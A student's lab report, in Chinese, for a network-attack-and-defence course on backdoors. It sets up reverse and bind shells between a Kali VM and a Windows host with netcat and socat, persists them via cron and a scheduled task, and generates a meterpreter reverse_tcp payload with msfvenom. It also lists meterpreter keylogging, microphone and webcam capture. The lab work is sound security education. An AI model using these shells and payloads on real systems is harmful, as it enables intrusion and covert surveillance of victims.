20145336张子扬 《网络对抗》 后门原理和实践

20145336张子扬 《网络对抗》第2周学习总结

实验二：后门原理和实践

学习知识点

后门

• 概念：后门程序就是留在计算机系统中，供某位特殊使用者通过某种特殊方式控制计算机系统的途径。

• 与木马的区别和联系： 联系在于：都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。 区别在于：木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马（简称"木马"），其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。

• 后门与病毒的区别：后门程序不一定有自我复制的动作，它是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。

基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式？

在网上浏览时，有可能会被一些网页插件植入后门

下载一些软件或者游戏时，可能会将后门一起下载下来

像安装软件时，在完成时会给你几个勾选项目，继续安装一些类似的软件，其中就很可能有后门软件。

例举你知道的后门如何启动起来(win及linux)的方式？

篡改了注册表，将其设为开机自动运行。

被控端被设置了任务计划启动，在被控端达到某个条件时程序运行，例如：锁屏。

伪装成其它程序，或者和其它程序绑定在一起，在运行其它程序时自动运行。

Meterpreter有哪些给你映像深刻的功能？

可以截取被控端一段音频；

可以抓拍被控端；

可以对打开被控端的摄像头，进行实时录像；

可以打开，并且查看被控端的任意文件；

可以获取被控端的键盘输入；

可以查看被控端的系统信息；

可以获取被控端的网卡信息；

如何发现自己有系统有没有被安装后门？

检查防火墙开启的端口和它对应的进程，如果不是系统默认开启的端口都有嫌疑，找到对应的进程，对其进行抓包分析；

下载专门的监控软件，对操作系统中的进程进行监控，看是否存在异常。

实验内容

• 使用netcat、socat获取主机操作Shell，并分别设置cron启动与任务计划启动

• 使用MSF meterpreter生成后门的可执行文件，并利用ncat或socat传送给主机，接着运行文件获取目标主机的音频、摄像头、击键记录、提权等内容

实验过程

linux获取win shell

1、首先在linux系统上使用ifconfig命令获取本机的ip

2、使用nc指令监听8888端口：

3、在win下，使用ncat.exe程序反向链接选项（-e），反向连接Kali的8888端口：

4、最后成功连接，获取了win shell，可以查看Win的命令提示，可以输入Win中的命令：

win获取linux shell

道理和linux获取win shell一毛一样

1、首先在win系统上使用ipconfig命令获取本机的ip

2、使用ncat.exe监听本机的8888端口：

3、在linux虚拟机下，使用nc指令的反向连接选项反向链接Win主机的8888端口：

4、最后成功链接，获取linux的shell，可以插看linux的命令行，并且可以使用linux中的命令指令：

使用nc传递文件

使用nc可以向被控端发送数据，可以传递信息，也可以传输文件，在之后的试验中有用到。

使用netcat获取主机操作Shell，cron启动

1、首先在win系统下监听8888端口

2、在Kali环境中，使用crontab -e指令编辑一条定时任务，在图中50，代表每个小时第50分钟，任务会自动运行。下面是win主机的ip地址和监听的端口号。

3、在50分钟时，任务开始运行。此时已经获取了inux的shell，可以使用linux的任何命令。但在50分钟之前，任何命令都是无效的，输入的命令在第50分钟才会显示出来。

使用socat获取主机操作Shell, 任务计划启动

1、在问下，打开控制面板》管理工具》任务计划程序》创建任务，创建一个新的触发器。在操作》程序或脚本中选择socat.exe文件的路径，在添加参数中填写tcp-listen:XXXX exec:cmd.exe,pty,stderr，将充满电绑定到端口XXXX上。

2、创建完成后，触发任务计划，发现任务已经开始运行：

3、在Kali中输入指令socat - tcp:192.168.43.4:2345，此时已经获得cmd shell：

MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1、产生后门程序，使用指令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192
.168.1.116 LPORT=2345 -f exe > 20145336_backdoor.exe

2、通过nc指令将生成的后门传送到win主机上：

3、在Kali环境中使用msfconsole指令进入msf控制台设置地址，监听端口号，设置完成后，执行监听：

4、在win上运行后门程序：

5、成功远程控制win主机：

使用msf meterpreter指令

1、使用getuid指令查看当前用户

2、使用screenshot截屏

3、使用keyscanstart指令开始记录下敲键的过程，使用keyscandump指令停止读取：

4、使用record_mic指令截获一段音频：

5、使用webcam_snap指令可以使用摄像头进行拍照：

6、使用webcam_stream指令进行实时录像：

实验体会

本次实验是我做过为数不多比较有意思的实验。此次实验是使用集中方法获取另一台电脑的shell。这次的实验感觉是在电影中才会出现的场景，在成功使用meterpreter获取另一台主机的信息后。我感觉还是蛮有成就感的。当然这次做的实验也有很多缺陷，例如在另一台电脑中的后门软件都是nc拷贝进去的。也许可以试试将这些后门使用别的方法送入对方的计算机中。

本次实验也让我意识到了一个很严重的问题，就是在我们现在的信息时代，信息的安全保障有多么的不可靠。如果不学习这些知识，不去主动了解这些知识，你很难想象的到，网络世界有多么的不安全。所以加强安全意识是每一个使用网络用户的必要准则。